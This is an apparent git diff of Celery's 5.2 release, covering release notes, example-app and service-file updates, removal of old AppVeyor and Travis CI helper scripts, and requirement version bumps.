+no further security patches will be applied for Python 3.6 after
+the 23rd of December, 2021.
+
+Tasks
+-----
+
+When replacing a task with another task, we now give an indication of the
+replacement nesting level through the ``replaced_task_nesting`` header.
+
+A task which was never replaced has a ``replaced_task_nesting`` value of 0.
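+
+As a rough sketch, a bound task can read the header from its request
+(the task name below is only an example):
+
+.. code-block:: python
+
+    @app.task(bind=True)
+    def report_nesting(self):
+        # 0 if the task was never replaced, incremented on each replacement
+        print(self.request.replaced_task_nesting)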
+
+Kombu
+-----
+
+Starting from v5.2, the minimum required version is Kombu 5.2.0.
+
+Prefork Workers Pool
+---------------------
+
+Now all orphaned worker processes are killed automatically when the main process exits.
+
+Eventlet Workers Pool
+---------------------
+
+You can now terminate running revoked tasks while using the
+Eventlet Workers Pool.
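+
+For example, revoking with ``terminate=True`` now also works on an eventlet
+worker (``result`` is assumed to be an ``AsyncResult`` of a running task):
+
+.. code-block:: python
+
+    # stop the task even if it has already started executing
+    app.control.revoke(result.id, terminate=True)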
+
+Custom Task Classes
+-------------------
+
+We introduced a new handler called ``before_start``, which is executed
+before the task starts.
+
+See :ref:`custom-task-cls-app-wide` for more details.
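+
+A minimal sketch of a task class using the new handler:
+
+.. code-block:: python
+
+    from celery import Task
+
+    class MyTask(Task):
+        def before_start(self, task_id, args, kwargs):
+            # runs in the worker right before the task body executes
+            print(f'about to start {task_id}')
+
+    @app.task(base=MyTask)
+    def add(x, y):
+        return x + y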
+
+Important Notes From 5.0
+------------------------
+
+Dropped support for Python 2.7 & 3.5
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Celery now requires Python 3.6 and above.
+
+Python 2.7 reached EOL in January 2020.
+In order to focus our efforts we have dropped support for Python 2.7 in
+this version.
+
+In addition, Python 3.5 reached EOL in September 2020.
+Therefore, we are also dropping support for Python 3.5.
+
+If you still need to run Celery on Python 2.7 or Python 3.5,
+you can still use Celery 4.x.
+However, we encourage you to upgrade to a supported Python version since
+no further security patches will be applied for Python 2.7 or
+Python 3.5.
+
+Eventlet Workers Pool
+~~~~~~~~~~~~~~~~~~~~~
+
+Due to `eventlet/eventlet#526 `_
+the minimum required version is eventlet 0.26.1.
+
+Gevent Workers Pool
+~~~~~~~~~~~~~~~~~~~
+
+Starting from v5.0, the minimum required version is gevent 1.0.0.
+
+Couchbase Result Backend
+~~~~~~~~~~~~~~~~~~~~~~~~
+
+The Couchbase result backend now uses the V3 Couchbase SDK.
+
+As a result, we no longer support Couchbase Server 5.x.
+
+Also, starting from v5.0, the minimum required version
+for the database client is couchbase 3.0.0.
+
+To verify that your Couchbase Server is compatible with the V3 SDK,
+please refer to their `documentation `_.
+
+Riak Result Backend
+~~~~~~~~~~~~~~~~~~~
+
+The Riak result backend has been removed as the database is no longer maintained.
+
+The Python client only supports Python 3.6 and below, which prevents us from
+supporting it, and the client itself is also unmaintained.
+
+If you are still using Riak, refrain from upgrading to Celery 5.0 while you
+migrate your application to a different database.
+
+We apologize for the lack of advance notice, but we feel that the chance
+you'll be affected by this breaking change is minimal, which is why we
+went ahead with it.
+
+AMQP Result Backend
+~~~~~~~~~~~~~~~~~~~
+
+The AMQP result backend has been removed as it was deprecated in version 4.0.
+
+Removed Deprecated Modules
+~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The `celery.utils.encoding` and the `celery.task` modules were deprecated
+in version 4.0 and have therefore been removed in 5.0.
+
+If you were using the `celery.utils.encoding` module before,
+you should import `kombu.utils.encoding` instead.
+
+If you were using the `celery.task` module before, you should import directly
+from the `celery` module instead.
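+
+As a sketch, the import changes look roughly like this (``safe_str`` and the
+old ``task`` decorator are only examples of names you might have imported):
+
+.. code-block:: python
+
+    # Celery 4.x
+    from celery.utils.encoding import safe_str
+    from celery.task import task
+
+    # Celery 5.x
+    from kombu.utils.encoding import safe_str
+    from celery import shared_task as task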
+
+`azure-servicebus` 7.0.0 is now required
+----------------------------------------
+
+Given the SDK changes between 0.50.0 and 7.0.0, Kombu deprecates support for
+older `azure-servicebus` versions.
+
+.. _v520-news:
+
+Bug: Pymongo 3.12.1 is not compatible with Celery 5.2
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+For now we are limiting the Pymongo version, allowing only versions between 3.3.0 and 3.12.0.
+
+This will be fixed in the next patch.
+
+News
+====
+
+Support for invoking chords of unregistered tasks
+-------------------------------------------------
+
+Previously, if you attempted to publish a chord
+whose body was a signature that wasn't registered in the Celery app
+publishing the chord, a :exc:`celery.exceptions.NotRegistered`
+exception would be raised.
+
+From now on, you can publish such chords and they will be executed
+correctly:
+
+.. code-block:: python
+
+ # movies.task.publish_movie is registered in the current app
+ movie_task = celery_app.signature('movies.task.publish_movie', task_id=str(uuid.uuid4()), immutable=True)
+ # news.task.publish_news is *not* registered in the current app
+ news_task = celery_app.signature('news.task.publish_news', task_id=str(uuid.uuid4()), immutable=True)
+
+ my_chord = chain(movie_task,
+ group(movie_task.set(task_id=str(uuid.uuid4())),
+ movie_task.set(task_id=str(uuid.uuid4()))),
+ news_task)
+ my_chord.apply_async() # <-- No longer raises an exception
+
+Consul Result Backend
+---------------------
+
+We now create a new client per request to Consul to avoid a bug in the Consul
+client.
+
+The Consul Result Backend now accepts a new
+:setting:`result_backend_transport_options` key: ``one_client``.
+You can opt out of this behavior by setting ``one_client`` to ``True``.
+
+Please refer to the documentation of the backend if you're using the Consul
+backend to find out which behavior suits you.
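+
+As an illustration, enabling the single-client behavior could look like this
+(the Consul URL is a placeholder):
+
+.. code-block:: python
+
+    app.conf.result_backend = 'consul://localhost:8500/'
+    # reuse one Consul client instead of creating a new one per request
+    app.conf.result_backend_transport_options = {'one_client': True}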
+
+Filesystem Result Backend
+-------------------------
+
+We now clean up expired task results when using the
+filesystem result backend, as most result backends do.
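+
+A sketch of a configuration this applies to, assuming the standard
+:setting:`result_expires` setting controls when results are considered
+expired (the path is a placeholder):
+
+.. code-block:: python
+
+    app.conf.result_backend = 'file:///var/celery/results'
+    # results older than an hour are removed by the cleanup
+    app.conf.result_expires = 3600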
+
+ArangoDB Result Backend
+-----------------------
+
+You can now check the validity of the CA certificate while making
+a TLS connection to the ArangoDB result backend.
+
+If you'd like to do so, set the ``verify`` key in the
+:setting:`arangodb_backend_settings` dictionary to ``True``.
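+
+For example (a sketch; only the ``verify`` key is relevant here):
+
+.. code-block:: python
+
+    app.conf.arangodb_backend_settings = {
+        # validate the CA certificate when connecting over TLS
+        'verify': True,
+    }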
diff --git a/examples/app/myapp.py b/examples/app/myapp.py
index 3490a3940bd..7ee8727095a 100644
--- a/examples/app/myapp.py
+++ b/examples/app/myapp.py
@@ -2,7 +2,7 @@
Usage::
- (window1)$ python myapp.py worker -l info
+ (window1)$ python myapp.py worker -l INFO
(window2)$ python
>>> from myapp import add
@@ -13,13 +13,13 @@
You can also specify the app to use with the `celery` command,
using the `-A` / `--app` option::
- $ celery -A myapp worker -l info
+ $ celery -A myapp worker -l INFO
With the `-A myproj` argument the program will search for an app
instance in the module ``myproj``. You can also specify an explicit
name using the fully qualified form::
- $ celery -A myapp:app worker -l info
+ $ celery -A myapp:app worker -l INFO
"""
diff --git a/examples/celery_http_gateway/manage.py b/examples/celery_http_gateway/manage.py
index 2c41aaabd87..3109e100b4d 100644
--- a/examples/celery_http_gateway/manage.py
+++ b/examples/celery_http_gateway/manage.py
@@ -3,7 +3,7 @@
from django.core.management import execute_manager
try:
- import settings # Assumed to be in the same directory.
+ import settings # Assumed to be in the same directory.
except ImportError:
import sys
sys.stderr.write(
diff --git a/examples/celery_http_gateway/settings.py b/examples/celery_http_gateway/settings.py
index a671b980e49..d8001673c90 100644
--- a/examples/celery_http_gateway/settings.py
+++ b/examples/celery_http_gateway/settings.py
@@ -75,11 +75,11 @@
'django.template.loaders.app_directories.load_template_source',
)
-MIDDLEWARE_CLASSES = (
+MIDDLEWARE = [
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
-)
+]
ROOT_URLCONF = 'celery_http_gateway.urls'
diff --git a/examples/celery_http_gateway/urls.py b/examples/celery_http_gateway/urls.py
index 522b39ff8d1..c916ff8029b 100644
--- a/examples/celery_http_gateway/urls.py
+++ b/examples/celery_http_gateway/urls.py
@@ -1,7 +1,6 @@
+from celery_http_gateway.tasks import hello_world
from django.conf.urls.defaults import (handler404, handler500, # noqa
include, patterns, url)
-
-from celery_http_gateway.tasks import hello_world
from djcelery import views as celery_views
# Uncomment the next two lines to enable the admin:
diff --git a/examples/django/README.rst b/examples/django/README.rst
index 0334ef7df04..80d7a13cadd 100644
--- a/examples/django/README.rst
+++ b/examples/django/README.rst
@@ -46,7 +46,7 @@ Starting the worker
.. code-block:: console
- $ celery -A proj worker -l info
+ $ celery -A proj worker -l INFO
Running a task
===================
diff --git a/examples/django/demoapp/models.py b/examples/django/demoapp/models.py
index bec42a2b041..1f7d09ead22 100644
--- a/examples/django/demoapp/models.py
+++ b/examples/django/demoapp/models.py
@@ -1,4 +1,4 @@
-from django.db import models # noqa
+from django.db import models
class Widget(models.Model):
diff --git a/examples/django/demoapp/tasks.py b/examples/django/demoapp/tasks.py
index ac309b8c9fd..c16b76b4c4f 100644
--- a/examples/django/demoapp/tasks.py
+++ b/examples/django/demoapp/tasks.py
@@ -1,8 +1,9 @@
# Create your tasks here
-from celery import shared_task
from demoapp.models import Widget
+from celery import shared_task
+
@shared_task
def add(x, y):
diff --git a/examples/django/proj/celery.py b/examples/django/proj/celery.py
index 429afff312a..9766a2ac2ee 100644
--- a/examples/django/proj/celery.py
+++ b/examples/django/proj/celery.py
@@ -2,7 +2,7 @@
from celery import Celery
-# set the default Django settings module for the 'celery' program.
+# Set the default Django settings module for the 'celery' program.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proj.settings')
app = Celery('proj')
@@ -13,7 +13,7 @@
# should have a `CELERY_` prefix.
app.config_from_object('django.conf:settings', namespace='CELERY')
-# Load task modules from all registered Django app configs.
+# Load task modules from all registered Django apps.
app.autodiscover_tasks()
diff --git a/examples/django/proj/urls.py b/examples/django/proj/urls.py
index 2616749dd6e..5f67c27b660 100644
--- a/examples/django/proj/urls.py
+++ b/examples/django/proj/urls.py
@@ -1,4 +1,4 @@
-from django.conf.urls import handler404, handler500, include, url # noqa
+from django.urls import handler404, handler500, include, url # noqa
# Uncomment the next two lines to enable the admin:
# from django.contrib import admin
diff --git a/examples/django/proj/wsgi.py b/examples/django/proj/wsgi.py
index 1bb1b542185..d07dbf074cc 100644
--- a/examples/django/proj/wsgi.py
+++ b/examples/django/proj/wsgi.py
@@ -19,7 +19,7 @@
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
-from django.core.wsgi import get_wsgi_application # noqa
+from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proj.settings')
diff --git a/examples/django/requirements.txt b/examples/django/requirements.txt
index 72e653a9d83..4ba37fb5b8a 100644
--- a/examples/django/requirements.txt
+++ b/examples/django/requirements.txt
@@ -1,3 +1,3 @@
-django>=2.0.0
+django>=2.2.1
sqlalchemy>=1.0.14
-celery>=4.3.0
+celery>=5.0.5
diff --git a/examples/eventlet/README.rst b/examples/eventlet/README.rst
index 672ff6f1461..84a1856f314 100644
--- a/examples/eventlet/README.rst
+++ b/examples/eventlet/README.rst
@@ -18,7 +18,7 @@ Before you run any of the example tasks you need to start
the worker::
$ cd examples/eventlet
- $ celery worker -l info --concurrency=500 --pool=eventlet
+ $ celery worker -l INFO --concurrency=500 --pool=eventlet
As usual you need to have RabbitMQ running, see the Celery getting started
guide if you haven't installed it yet.
diff --git a/examples/eventlet/webcrawler.py b/examples/eventlet/webcrawler.py
index 80fb523a742..617e9187567 100644
--- a/examples/eventlet/webcrawler.py
+++ b/examples/eventlet/webcrawler.py
@@ -23,15 +23,15 @@
import re
import requests
-
-from celery import group, task
from eventlet import Timeout
from pybloom import BloomFilter
+from celery import group, task
+
try:
from urllib.parse import urlsplit
except ImportError:
- from urlparse import urlsplit # noqa
+ from urlparse import urlsplit
# http://daringfireball.net/2009/11/liberal_regex_for_matching_urls
url_regex = re.compile(
diff --git a/examples/next-steps/proj/celery.py b/examples/next-steps/proj/celery.py
index f9be2a1c549..39ce69199a9 100644
--- a/examples/next-steps/proj/celery.py
+++ b/examples/next-steps/proj/celery.py
@@ -2,7 +2,7 @@
app = Celery('proj',
broker='amqp://',
- backend='amqp://',
+ backend='rpc://',
include=['proj.tasks'])
# Optional configuration, see the application user guide.
diff --git a/examples/next-steps/setup.py b/examples/next-steps/setup.py
index 8d9415cbd29..50449e59934 100644
--- a/examples/next-steps/setup.py
+++ b/examples/next-steps/setup.py
@@ -14,26 +14,26 @@
author='Ola A. Normann',
author_email='author@example.com',
keywords='our celery integration',
- version='1.0',
+ version='2.0',
description='Tasks for my project',
long_description=__doc__,
license='BSD',
packages=find_packages(exclude=['ez_setup', 'tests', 'tests.*']),
- test_suite='nose.collector',
+ test_suite='pytest',
zip_safe=False,
install_requires=[
- 'celery>=4.0',
+ 'celery>=5.0',
# 'requests',
],
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: BSD License',
- 'Programming Language :: Python :: 2',
- 'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
- 'Programming Language :: Python :: 3.5',
+ 'Programming Language :: Python :: 3.6',
+ 'Programming Language :: Python :: 3.7',
+ 'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: Implementation :: CPython',
- 'Programming Language :: Python :: Implementation :: PyPy',
+ 'Programming Language :: Python :: Implementation :: PyPy3',
'Operating System :: OS Independent',
],
)
diff --git a/examples/periodic-tasks/myapp.py b/examples/periodic-tasks/myapp.py
index 166b9234146..b2e4f0b8045 100644
--- a/examples/periodic-tasks/myapp.py
+++ b/examples/periodic-tasks/myapp.py
@@ -3,10 +3,10 @@
Usage::
# The worker service reacts to messages by executing tasks.
- (window1)$ python myapp.py worker -l info
+ (window1)$ python myapp.py worker -l INFO
# The beat service sends messages at scheduled intervals.
- (window2)$ python myapp.py beat -l info
+ (window2)$ python myapp.py beat -l INFO
# XXX To diagnose problems use -l debug:
(window2)$ python myapp.py beat -l debug
@@ -18,13 +18,13 @@
You can also specify the app to use with the `celery` command,
using the `-A` / `--app` option::
- $ celery -A myapp worker -l info
+ $ celery -A myapp worker -l INFO
With the `-A myproj` argument the program will search for an app
instance in the module ``myproj``. You can also specify an explicit
name using the fully qualified form::
- $ celery -A myapp:app worker -l info
+ $ celery -A myapp:app worker -l INFO
"""
diff --git a/examples/security/mysecureapp.py b/examples/security/mysecureapp.py
index 9578fa62272..21061a890da 100644
--- a/examples/security/mysecureapp.py
+++ b/examples/security/mysecureapp.py
@@ -14,7 +14,7 @@
cd examples/security
- (window1)$ python mysecureapp.py worker -l info
+ (window1)$ python mysecureapp.py worker -l INFO
(window2)$ cd examples/security
(window2)$ python
diff --git a/extra/appveyor/install.ps1 b/extra/appveyor/install.ps1
deleted file mode 100644
index 7166f65e37a..00000000000
--- a/extra/appveyor/install.ps1
+++ /dev/null
@@ -1,85 +0,0 @@
-# Sample script to install Python and pip under Windows
-# Authors: Olivier Grisel and Kyle Kastner
-# License: CC0 1.0 Universal: https://creativecommons.org/publicdomain/zero/1.0/
-
-$BASE_URL = "https://www.python.org/ftp/python/"
-$GET_PIP_URL = "https://bootstrap.pypa.io/get-pip.py"
-$GET_PIP_PATH = "C:\get-pip.py"
-
-
-function DownloadPython ($python_version, $platform_suffix) {
- $webclient = New-Object System.Net.WebClient
- $filename = "python-" + $python_version + $platform_suffix + ".msi"
- $url = $BASE_URL + $python_version + "/" + $filename
-
- $basedir = $pwd.Path + "\"
- $filepath = $basedir + $filename
- if (Test-Path $filename) {
- Write-Host "Reusing" $filepath
- return $filepath
- }
-
- # Download and retry up to 5 times in case of network transient errors.
- Write-Host "Downloading" $filename "from" $url
- $retry_attempts = 3
- for($i=0; $i -lt $retry_attempts; $i++){
- try {
- $webclient.DownloadFile($url, $filepath)
- break
- }
- Catch [Exception]{
- Start-Sleep 1
- }
- }
- Write-Host "File saved at" $filepath
- return $filepath
-}
-
-
-function InstallPython ($python_version, $architecture, $python_home) {
- Write-Host "Installing Python" $python_version "for" $architecture "bit architecture to" $python_home
- if (Test-Path $python_home) {
- Write-Host $python_home "already exists, skipping."
- return $false
- }
- if ($architecture -eq "32") {
- $platform_suffix = ""
- } else {
- $platform_suffix = ".amd64"
- }
- $filepath = DownloadPython $python_version $platform_suffix
- Write-Host "Installing" $filepath "to" $python_home
- $args = "/qn /i $filepath TARGETDIR=$python_home"
- Write-Host "msiexec.exe" $args
- Start-Process -FilePath "msiexec.exe" -ArgumentList $args -Wait -Passthru
- Write-Host "Python $python_version ($architecture) installation complete"
- return $true
-}
-
-
-function InstallPip ($python_home) {
- $pip_path = $python_home + "/Scripts/pip.exe"
- $python_path = $python_home + "/python.exe"
- if (-not(Test-Path $pip_path)) {
- Write-Host "Installing pip..."
- $webclient = New-Object System.Net.WebClient
- $webclient.DownloadFile($GET_PIP_URL, $GET_PIP_PATH)
- Write-Host "Executing:" $python_path $GET_PIP_PATH
- Start-Process -FilePath "$python_path" -ArgumentList "$GET_PIP_PATH" -Wait -Passthru
- } else {
- Write-Host "pip already installed."
- }
-}
-
-function InstallPackage ($python_home, $pkg) {
- $pip_path = $python_home + "/Scripts/pip.exe"
- & $pip_path install $pkg
-}
-
-function main () {
- InstallPython $env:PYTHON_VERSION $env:PYTHON_ARCH $env:PYTHON
- InstallPip $env:PYTHON
- InstallPackage $env:PYTHON wheel
-}
-
-main
diff --git a/extra/appveyor/run_with_compiler.cmd b/extra/appveyor/run_with_compiler.cmd
deleted file mode 100644
index 31bd205ecbb..00000000000
--- a/extra/appveyor/run_with_compiler.cmd
+++ /dev/null
@@ -1,47 +0,0 @@
-:: To build extensions for 64 bit Python 3, we need to configure environment
-:: variables to use the MSVC 2010 C++ compilers from GRMSDKX_EN_DVD.iso of:
-:: MS Windows SDK for Windows 7 and .NET Framework 4 (SDK v7.1)
-::
-:: To build extensions for 64 bit Python 2, we need to configure environment
-:: variables to use the MSVC 2008 C++ compilers from GRMSDKX_EN_DVD.iso of:
-:: MS Windows SDK for Windows 7 and .NET Framework 3.5 (SDK v7.0)
-::
-:: 32 bit builds do not require specific environment configurations.
-::
-:: Note: this script needs to be run with the /E:ON and /V:ON flags for the
-:: cmd interpreter, at least for (SDK v7.0)
-::
-:: More details at:
-:: https://github.com/cython/cython/wiki/64BitCythonExtensionsOnWindows
-:: https://stackoverflow.com/a/13751649/163740
-::
-:: Author: Olivier Grisel
-:: License: CC0 1.0 Universal: https://creativecommons.org/publicdomain/zero/1.0/
-@ECHO OFF
-
-SET COMMAND_TO_RUN=%*
-SET WIN_SDK_ROOT=C:\Program Files\Microsoft SDKs\Windows
-
-SET MAJOR_PYTHON_VERSION="%PYTHON_VERSION:~0,1%"
-IF %MAJOR_PYTHON_VERSION% == "2" (
- SET WINDOWS_SDK_VERSION="v7.0"
-) ELSE IF %MAJOR_PYTHON_VERSION% == "3" (
- SET WINDOWS_SDK_VERSION="v7.1"
-) ELSE (
- ECHO Unsupported Python version: "%MAJOR_PYTHON_VERSION%"
- EXIT 1
-)
-
-IF "%PYTHON_ARCH%"=="64" (
- ECHO Configuring Windows SDK %WINDOWS_SDK_VERSION% for Python %MAJOR_PYTHON_VERSION% on a 64 bit architecture
- SET DISTUTILS_USE_SDK=1
- SET MSSdk=1
- "%WIN_SDK_ROOT%\%WINDOWS_SDK_VERSION%\Setup\WindowsSdkVer.exe" -q -version:%WINDOWS_SDK_VERSION%
- "%WIN_SDK_ROOT%\%WINDOWS_SDK_VERSION%\Bin\SetEnv.cmd" /x64 /release
- ECHO Executing: %COMMAND_TO_RUN%
- call %COMMAND_TO_RUN% || EXIT 1
-) ELSE (
- ECHO Using default MSVC build environment for 32 bit architecture
- ECHO Executing: %COMMAND_TO_RUN%
- call %COMMAND_TO_RUN% || EXIT 1
-)
diff --git a/extra/generic-init.d/celerybeat b/extra/generic-init.d/celerybeat
index 8f977903e3a..c875e33e27d 100755
--- a/extra/generic-init.d/celerybeat
+++ b/extra/generic-init.d/celerybeat
@@ -25,7 +25,7 @@ echo "celery init v${VERSION}."
if [ $(id -u) -ne 0 ]; then
echo "Error: This program can only be used by the root user."
- echo " Unpriviliged users must use 'celery beat --detach'"
+ echo " Unprivileged users must use 'celery beat --detach'"
exit 1
fi
@@ -110,7 +110,7 @@ DEFAULT_USER="celery"
DEFAULT_PID_FILE="/var/run/celery/beat.pid"
DEFAULT_LOG_FILE="/var/log/celery/beat.log"
DEFAULT_LOG_LEVEL="INFO"
-DEFAULT_CELERYBEAT="$CELERY_BIN beat"
+DEFAULT_CELERYBEAT="$CELERY_BIN"
CELERYBEAT=${CELERYBEAT:-$DEFAULT_CELERYBEAT}
CELERYBEAT_LOG_LEVEL=${CELERYBEAT_LOG_LEVEL:-${CELERYBEAT_LOGLEVEL:-$DEFAULT_LOG_LEVEL}}
@@ -141,8 +141,6 @@ fi
export CELERY_LOADER
-CELERYBEAT_OPTS="$CELERYBEAT_OPTS -f $CELERYBEAT_LOG_FILE -l $CELERYBEAT_LOG_LEVEL"
-
if [ -n "$2" ]; then
CELERYBEAT_OPTS="$CELERYBEAT_OPTS $2"
fi
@@ -254,8 +252,11 @@ _chuid () {
start_beat () {
echo "Starting ${SCRIPT_NAME}..."
- _chuid $CELERY_APP_ARG $CELERYBEAT_OPTS $DAEMON_OPTS --detach \
- --pidfile="$CELERYBEAT_PID_FILE"
+ _chuid $CELERY_APP_ARG $DAEMON_OPTS beat --detach \
+ --pidfile="$CELERYBEAT_PID_FILE" \
+ --logfile="$CELERYBEAT_LOG_FILE" \
+ --loglevel="$CELERYBEAT_LOG_LEVEL" \
+ $CELERYBEAT_OPTS
}
diff --git a/extra/generic-init.d/celeryd b/extra/generic-init.d/celeryd
index 56d92beac2c..b928eebeb70 100755
--- a/extra/generic-init.d/celeryd
+++ b/extra/generic-init.d/celeryd
@@ -269,7 +269,7 @@ dryrun () {
stop_workers () {
- _chuid stopwait $CELERYD_NODES --pidfile="$CELERYD_PID_FILE"
+ _chuid stopwait $CELERYD_NODES $DAEMON_OPTS --pidfile="$CELERYD_PID_FILE"
}
diff --git a/extra/supervisord/celerybeat.conf b/extra/supervisord/celerybeat.conf
index c920b30dfda..8710c31ac1f 100644
--- a/extra/supervisord/celerybeat.conf
+++ b/extra/supervisord/celerybeat.conf
@@ -4,7 +4,7 @@
[program:celerybeat]
; Set full path to celery program if using virtualenv
-command=celery beat -A myapp --schedule /var/lib/celery/beat.db --loglevel=INFO
+command=celery -A myapp beat --schedule /var/lib/celery/beat.db --loglevel=INFO
; remove the -A myapp argument if you aren't using an app instance
diff --git a/extra/supervisord/celeryd.conf b/extra/supervisord/celeryd.conf
index 2668ccb4c17..90254f7d4cd 100644
--- a/extra/supervisord/celeryd.conf
+++ b/extra/supervisord/celeryd.conf
@@ -15,7 +15,7 @@ autorestart=true
startsecs=10
; Set full path to celery program if using virtualenv
-command=celery worker -A proj --loglevel=INFO
+command=celery -A proj worker --loglevel=INFO
; Alternatively,
;command=celery --app=your_app.celery:app worker --loglevel=INFO -n worker.%%h
diff --git a/extra/systemd/celery.service b/extra/systemd/celery.service
index b1d6d03b723..ff6bacb89ed 100644
--- a/extra/systemd/celery.service
+++ b/extra/systemd/celery.service
@@ -8,13 +8,13 @@ User=celery
Group=celery
EnvironmentFile=-/etc/conf.d/celery
WorkingDirectory=/opt/celery
-ExecStart=/bin/sh -c '${CELERY_BIN} multi start $CELERYD_NODES \
- -A $CELERY_APP --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
+ExecStart=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi start $CELERYD_NODES \
+ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
--loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS'
ExecStop=/bin/sh -c '${CELERY_BIN} multi stopwait $CELERYD_NODES \
- --pidfile=${CELERYD_PID_FILE}'
-ExecReload=/bin/sh -c '${CELERY_BIN} multi restart $CELERYD_NODES \
- -A $CELERY_APP --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
+ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE}'
+ExecReload=/bin/sh -c '${CELERY_BIN} -A $CELERY_APP multi restart $CELERYD_NODES \
+ --pidfile=${CELERYD_PID_FILE} --logfile=${CELERYD_LOG_FILE} \
--loglevel="${CELERYD_LOG_LEVEL}" $CELERYD_OPTS'
Restart=always
diff --git a/extra/systemd/celerybeat.service b/extra/systemd/celerybeat.service
index c8879612d19..c1b2034dcdd 100644
--- a/extra/systemd/celerybeat.service
+++ b/extra/systemd/celerybeat.service
@@ -6,11 +6,12 @@ After=network.target
Type=simple
User=celery
Group=celery
-EnvironmentFile=-/etc/conf.d/celery
+EnvironmentFile=/etc/conf.d/celery
WorkingDirectory=/opt/celery
-ExecStart=/bin/sh -c '${CELERY_BIN} beat \
- -A ${CELERY_APP} --pidfile=${CELERYBEAT_PID_FILE} \
+ExecStart=/bin/sh -c '${CELERY_BIN} -A ${CELERY_APP} beat \
+ --pidfile=${CELERYBEAT_PID_FILE} \
--logfile=${CELERYBEAT_LOG_FILE} --loglevel=${CELERYD_LOG_LEVEL}'
+Restart=always
[Install]
WantedBy=multi-user.target
diff --git a/extra/travis/is-memcached-running b/extra/travis/is-memcached-running
deleted file mode 100755
index 004608663c2..00000000000
--- a/extra/travis/is-memcached-running
+++ /dev/null
@@ -1,11 +0,0 @@
-#!/usr/bin/expect -f
-# based on https://stackoverflow.com/a/17265696/833093
-
-set destination [lindex $argv 0]
-set port [lindex $argv 1]
-
-spawn nc $destination $port
-send stats\r
-expect "END"
-send quit\r
-expect eof
diff --git a/pyproject.toml b/pyproject.toml
index 8b137891791..8ff14c4766b 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -1 +1,6 @@
-
+[tool.pytest.ini_options]
+addopts = "--strict-markers"
+testpaths = "t/unit/"
+python_classes = "test_*"
+xfail_strict=true
+markers = ["sleepdeprived_patched_module", "masked_modules", "patched_environ", "patched_module"]
diff --git a/requirements/default.txt b/requirements/default.txt
index 124c56679da..3be20593c97 100644
--- a/requirements/default.txt
+++ b/requirements/default.txt
@@ -1,7 +1,9 @@
-pytz>dev
-billiard>=3.6.3.0,<4.0
-kombu>=5.0.0,<6.0
+pytz>0.dev.0
+billiard>=3.6.4.0,<4.0
+kombu>=5.2.2,<6.0
vine>=5.0.0,<6.0
-click>=7.0
+click>=8.0,<9.0
click-didyoumean>=0.0.3
-click-repl>=0.1.6
+click-repl>=0.2.0
+click-plugins>=1.1.1
+setuptools
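
A word on the pytz bound above: swapping the legacy `pytz>dev` specifier for `pytz>0.dev.0` keeps the intent of "accept any released version" while using a PEP 440-compliant version string (the bare `dev` form is a legacy specifier that newer pip/setuptools releases reject). A minimal sketch, assuming the third-party `packaging` library, of how that specifier evaluates:

    # Illustrative only: "0.dev.0" normalizes to 0.dev0, the lowest possible
    # PEP 440 version, so ">0.dev.0" admits any real release of pytz.
    from packaging.specifiers import SpecifierSet
    from packaging.version import Version

    spec = SpecifierSet(">0.dev.0")
    print(Version("0.dev.0"))    # 0.dev0 (normalized form)
    print("2021.3" in spec)      # True, so any released pytz satisfies the bound
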
diff --git a/requirements/dev.txt b/requirements/dev.txt
index 9712c15a2e3..8d28a2924cf 100644
--- a/requirements/dev.txt
+++ b/requirements/dev.txt
@@ -1,5 +1,5 @@
pytz>dev
-git+https://github.com/celery/kombu.git
git+https://github.com/celery/py-amqp.git
+git+https://github.com/celery/kombu.git
git+https://github.com/celery/billiard.git
-vine==1.3.0
\ No newline at end of file
+vine>=5.0.0
\ No newline at end of file
diff --git a/requirements/docs.txt b/requirements/docs.txt
index 69d31dffcce..46b82bd3c26 100644
--- a/requirements/docs.txt
+++ b/requirements/docs.txt
@@ -6,3 +6,4 @@ sphinx-click==2.5.0
-r test.txt
-r deps/mock.txt
-r extras/auth.txt
+-r extras/sphinxautobuild.txt
diff --git a/requirements/extras/azureblockblob.txt b/requirements/extras/azureblockblob.txt
index 37c66507d89..a9208b97325 100644
--- a/requirements/extras/azureblockblob.txt
+++ b/requirements/extras/azureblockblob.txt
@@ -1,3 +1 @@
-azure-storage==0.36.0
-azure-common==1.1.5
-azure-storage-common==1.1.0
+azure-storage-blob==12.9.0
diff --git a/requirements/extras/consul.txt b/requirements/extras/consul.txt
index ad4ba8a08e1..7b85dde7b66 100644
--- a/requirements/extras/consul.txt
+++ b/requirements/extras/consul.txt
@@ -1 +1 @@
-python-consul
+python-consul2
diff --git a/requirements/extras/couchbase.txt b/requirements/extras/couchbase.txt
index ec2b4864740..a736d6a7742 100644
--- a/requirements/extras/couchbase.txt
+++ b/requirements/extras/couchbase.txt
@@ -1 +1 @@
-couchbase>=3.0.0
+couchbase>=3.0.0; platform_python_implementation!='PyPy' and (platform_system != 'Windows' or python_version < '3.10')
\ No newline at end of file
diff --git a/requirements/extras/eventlet.txt b/requirements/extras/eventlet.txt
index e375a087b83..047d9cbcbae 100644
--- a/requirements/extras/eventlet.txt
+++ b/requirements/extras/eventlet.txt
@@ -1 +1 @@
-eventlet>=0.26.1
+eventlet>=0.32.0; python_version<"3.10"
diff --git a/requirements/extras/gevent.txt b/requirements/extras/gevent.txt
index 2fc04b699b3..4d5a00d0fb4 100644
--- a/requirements/extras/gevent.txt
+++ b/requirements/extras/gevent.txt
@@ -1 +1 @@
-gevent>=1.0.0
